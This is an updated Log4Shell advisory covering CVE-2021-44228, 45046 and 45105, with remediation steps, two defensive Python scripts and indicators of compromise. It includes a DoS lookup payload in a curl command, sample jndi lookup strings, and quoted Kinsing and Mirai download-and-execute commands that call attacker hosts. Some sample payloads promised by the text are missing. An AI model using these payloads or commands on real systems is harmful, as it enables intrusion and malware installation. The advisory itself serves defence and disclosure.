Log4Shell Multiple Critical Vulnerabilities: Updated Advisory

The Log4j vulnerability is now being exploited by notorious ransomware groups such as Khonsari and Conti. Log4j2 has had 3 high-priority security patches in the last week alone, raising the threat severity.
Updated on: April 19, 2023
Published on: December 23, 2021

Category: Vulnerability Intelligence
Vulnerability Class: Remote Code Execution (Unauthenticated); Restricted Remote Code Execution; Denial of Service
CVSS 3.0 Score: 10 (CVE-2021-44228); 9 (CVE-2021-45046); 7.5 (CVE-2021-45105)

Executive Summary

  • This is an updated advisory in the context of the Log4Shell vulnerability advisory that CloudSEK sent out on 13 December 2021, covering the significant developments that have emerged since.
  • The vulnerability is now being exploited by notorious ransomware groups such as Khonsari and Conti.
  • Log4j2 has had 3 high-priority security patches in the last week alone, raising the threat severity.
  • Threat actors have significantly broadened their scanning for the vulnerabilities, and multiple high-profile, financially motivated threat groups have already piggybacked on the flaw to execute significant attacks.
  • Users are recommended to update to version 2.17.0 or later of Log4j2.

Threat actors selling malware suited for the vulnerabilities on Telegram channels

What is Log4j?

Log4j2 is a Java-based logging library used in various open-source libraries and extensively in major software and services such as Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, Minecraft: Java Edition, Tencent QQ, HCL, VMware, Adobe, Atlassian, etc.

Timeline of Events

On 9 December 2021, a bug dubbed Log4Shell was disclosed on the internet together with a PoC: an RCE flaw tracked as CVE-2021-44228. It was deemed one of the most destructive vulnerabilities ever discovered. To mitigate it, a patch was released on 13 December 2021 (v2.15.0).

This version was first reported to be vulnerable to DoS (Denial of Service) attacks; researchers then confirmed that there were bypasses of the implemented fix, which made this version susceptible to the RCE flaw CVE-2021-45046 as well. To mitigate that flaw another patch was released, which was itself vulnerable to DoS attacks (CVE-2021-45105). Finally, a high-priority security patch was released as v2.17.0 to mitigate all of these vulnerabilities.

Vulnerability Analysis


The vulnerability in Log4j was caused by the way JNDI (Java Naming and Directory Interface) lookups were configured: the library set no restrictions on where LDAP (Lightweight Directory Access Protocol) lookups could connect. An attacker could leverage this by sending a request (for example, an HTTP GET) containing a JNDI lookup string to any endpoint that logs it; the vulnerable server then contacts the attacker's LDAP server, which responds with a reference to a remote Java class file. When the server loads that class, the result is Remote Code Execution.

The Java library that does the logging interprets part of the logged string as a lookup to be evaluated, instead of just writing it to the log. For example, an attacker could use a login page, placing the attack string in the username field where they know it will be logged.

This vulnerability affected versions 2.0-beta9 to 2.14.1 and was fixed in version 2.15.0.


CVE-2021-45046, originally discovered on 13 December 2021, had only DoS as a potential attack vector and a CVSS score of 3.7. The score has since been raised to 9, because in some non-default configurations it is still possible to achieve Remote Code Execution.

As an official workaround for CVE-2021-44228 it was advised to either:

  • set the system property

formatMsgNoLookups: true

  • or set the JVM parameter

JAVA_OPTS = -Dlog4j2.formatMsgNoLookups=true

In version 2.15.0 these parameters were set to true by default. Bypasses were later discovered that overcome these workarounds in certain circumstances.

“Only Pattern Layouts with a Context Lookup (for example, $${ctx:loginId}) are vulnerable to this. This page previously incorrectly mentioned that Thread Context Map pattern (%X, %mdc, or %MDC) in the layout would also allow this vulnerability.

While Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default, there are ways to bypass this and users should not rely on this.”

This is an excerpt from the official Log4j security blog, which mentions the scenario in which v2.15.0 is also vulnerable to Remote Code Execution.

In this version, if the attacker input is being passed into the function

logger.info("String" + attackerData);

it will not result in a JNDI lookup. But the attacker will still have access if the vulnerable Log4j is using the Thread Context Map:

ThreadContext.put("layout-pattern-value", attackerData);

The default properties in Log4j v2.15.0 only allowed local connections, so the impact was minimal; but if the attacker string was in the following format,


this resulted in a recursive reference that allowed the attacker to point the lookup at their own server, which made the JNDI lookup to the malicious server possible, injecting a remote Java class file and achieving Remote Code Execution.

This vulnerability specifically affects v2.15.0, and any version from 2.0-beta9 to 2.14.1 that relies on the official workaround mentioned above.


CVE-2021-45105 is a DoS vulnerability that an attacker can trigger through the self-referential lookup flaw: an attacker with control over Thread Context Map data can cause a denial of service when a crafted string is interpreted.

Sample payload: curl https://vulnerable.server:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'

This vulnerability affects versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3).
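As an added example (not code from the advisory or the Log4j project), the following Python normaliser shows the defender's side of the lookup syntax described above: it resolves the obfuscating ${lower:}, ${upper:} and ${...:-default} forms inside-out, flags a ${jndi:...} lookup once it surfaces, and bounds the passes it makes so that the nested self-referential payload shown above cannot exhaust it. The log lines and addresses are constructed samples.

```python
import re
INNERMOST = re.compile(r"\$\{([^{}]*)\}")  # innermost ${...}: its body has no braces
MAX_PASSES = 64  # each pass removes one lookup; the cap bounds work on hostile input

def _evaluate(body, found_jndi):
    """Approximate one Log4j lookup: ${prefix:key:-default}; the prefix is case-insensitive."""
    var, default = (body.split(":-", 1) + [None])[:2]
    prefix, _, key = var.partition(":")
    if prefix.lower() in ("lower", "upper"):
        return getattr(key, prefix.lower())()
    if prefix.lower() == "jndi":
        found_jndi.append(key)
        return f"<jndi:{key}>"  # inert marker, never re-parsed as a lookup
    # env/sys/ctx/date... are unknown here; obfuscation relies on the ":-default" branch
    return default if default is not None else ""

def nesting_depth(value):
    """Deepest ${ nesting; the self-referential DoS payload nests several levels."""
    depth = best = i = 0
    while i < len(value):
        if value.startswith("${", i):
            depth += 1; best = max(best, depth); i += 2; continue
        if value[i] == "}" and depth:
            depth -= 1
        i += 1
    return best

def analyse(value):
    """De-obfuscate lookups in one untrusted string and say why it is suspicious."""
    found, text, passes = [], value, 0
    while passes < MAX_PASSES and (m := INNERMOST.search(text)):
        text = text[:m.start()] + _evaluate(m.group(1), found) + text[m.end():]
        passes += 1
    depth = nesting_depth(value)
    reason = ("jndi lookup after de-obfuscation (CVE-2021-44228 / CVE-2021-45046)" if found else
              "nested lookup in untrusted input (CVE-2021-45105 DoS pattern)" if depth >= 2 else
              "lookup expression in untrusted input" if "${" in value else None)
    return {"normalized": text, "jndi": found, "depth": depth, "reason": reason}

# Constructed access-log lines (RFC 5737 documentation addresses), not from the advisory.
SAMPLE_LOG = [
    '203.0.113.7 "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.8 "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 "GET /api HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9/a}"',
    '203.0.113.8 "GET /api HTTP/1.1" 200 "${${::-${::-$${::-$}}}}"',
]

def scan_log(lines):
    results = ((n, analyse(line)) for n, line in enumerate(lines, 1))
    return [(n, r["reason"], r["normalized"]) for n, r in results if r["reason"]]
```

Any lookup expression in data that arrives from the network is worth alerting on; the de-obfuscated form tells the analyst which flaw the payload targets.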

Remediation Measures

To address these vulnerabilities, potential targets should follow these steps:

  1. Update to the latest version, i.e. 2.17.0 or later.
  2. If you cannot update Log4j2 to the latest version, remove the JndiLookup class from the classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Please Note: It is advisable to update and patch to the latest version, as this workaround might disrupt your normal logging activity.

  3. If you are unable to update to the latest version, resort to the IMMA model:

  • Isolate
  • Minimize
  • Monitor
  • Active Defense

Isolate the impacted systems on a VLAN dedicated to vulnerable hosts and deploy a proxy firewall with deep packet inspection to restrict communication with the rest of the systems. Monitor for irregular patterns, look for unauthorized configuration changes, and look for port/protocol mismatches in the infrastructure.

Please Note: If you are filtering on the keywords "ldap", "jndi" or ${lower:x}, bypasses are available; a sample payload can be:


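As an added example (not from the advisory or the Log4j project), this Python script verifies remediation steps 1 and 2 above: it reads the version from a log4j-core jar's manifest (assuming it carries an Implementation-Version attribute), checks whether the JndiLookup class is still present, and maps the version onto the affected ranges stated in this advisory. The jars it builds for the demo are constructed stand-ins, not real Log4j artifacts.

```python
import os, re, tempfile, zipfile
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
PRE = {"alpha": 0, "beta": 1, "rc": 2}  # pre-release tags sort before a final release (3)

def parse_version(v):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0), so tuples compare correctly."""
    core, _, pre = v.partition("-")
    nums = tuple(int(x) for x in core.split("."))
    m = re.match(r"([a-z]+)(\d*)", pre.lower()) if pre else None
    tag = (PRE.get(m.group(1), 0), int(m.group(2) or 0)) if m else (3, 0)
    return nums + (0,) * (3 - len(nums)) + tag

def applicable_cves(version):
    """Affected ranges as stated in the advisory (2.12.3 is excluded from CVE-2021-45105)."""
    v, V, cves = parse_version(version), parse_version, []
    if V("2.0-beta9") <= v <= V("2.14.1"):
        cves.append("CVE-2021-44228")
    if V("2.0-beta9") <= v <= V("2.15.0"):  # 2.15.0, or older builds relying on formatMsgNoLookups
        cves.append("CVE-2021-45046")
    if V("2.0-alpha1") <= v <= V("2.16.0") and v != V("2.12.3"):
        cves.append("CVE-2021-45105")
    return cves

def inspect_jar(path):
    """Read Implementation-Version from the manifest and check whether JndiLookup is still present."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace") if "META-INF/MANIFEST.MF" in names else ""
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
    version = m.group(1) if m else "unknown"
    cves = applicable_cves(version) if m else []
    jndi_present = JNDI_CLASS in names
    if not jndi_present:  # the class-removal workaround covers the JNDI RCE flaws, not the lookup DoS
        cves = [c for c in cves if c == "CVE-2021-45105"]
    action = "update to 2.17.0 or later" if cves else ("verify version manually" if not m else "none")
    return {"version": version, "jndi_lookup_present": jndi_present, "cves": cves, "action": action}

def make_sample_jar(path, version, keep_jndi=True):  # constructed stand-in jar: manifest + placeholder class
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if keep_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class

def demo():
    results = {}  # inspect_jar() output keyed by constructed jar name
    with tempfile.TemporaryDirectory() as tmp:
        for version, keep in (("2.14.1", True), ("2.14.1", False), ("2.17.0", True)):
            name = f"log4j-core-{version}-{'full' if keep else 'stripped'}.jar"
            make_sample_jar(os.path.join(tmp, name), version, keep)
            results[name] = inspect_jar(os.path.join(tmp, name))
    return results
```

Point inspect_jar() at every log4j-core jar found on a host (including copies bundled inside application archives) to confirm that the update or the class removal actually landed.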
Indicators Of Compromise

The following indicators of compromise are associated with observed exploitation activity targeting CVE-2021-44228.

IP Addresses

A list of malicious IP addresses detected for Apache Log4j RCE Attempts can be found here



Kinsing retrieval/execution commands (download URLs not shown):

curl -o /tmp/kinsing
curl -o /tmp/libsystem.so
curl -o /etc/kinsing
chmod 777 /tmp/kinsing
chattr -R -i /var/spool/cron
chmod +x /etc/kinsing


Hashes (SHA256)

Mirai retrieval script (SHA256):

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh)

Binary retrieval/execution commands

wget hxxp[:]//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;

wget hxxp[:]//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;

wget hxxp[:]//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

Mirai binary hashes (SHA256)

Mirai attacker IP address


Additional Malware Payload Hashes (SHA256)

Note: Refer to this collection of hashes

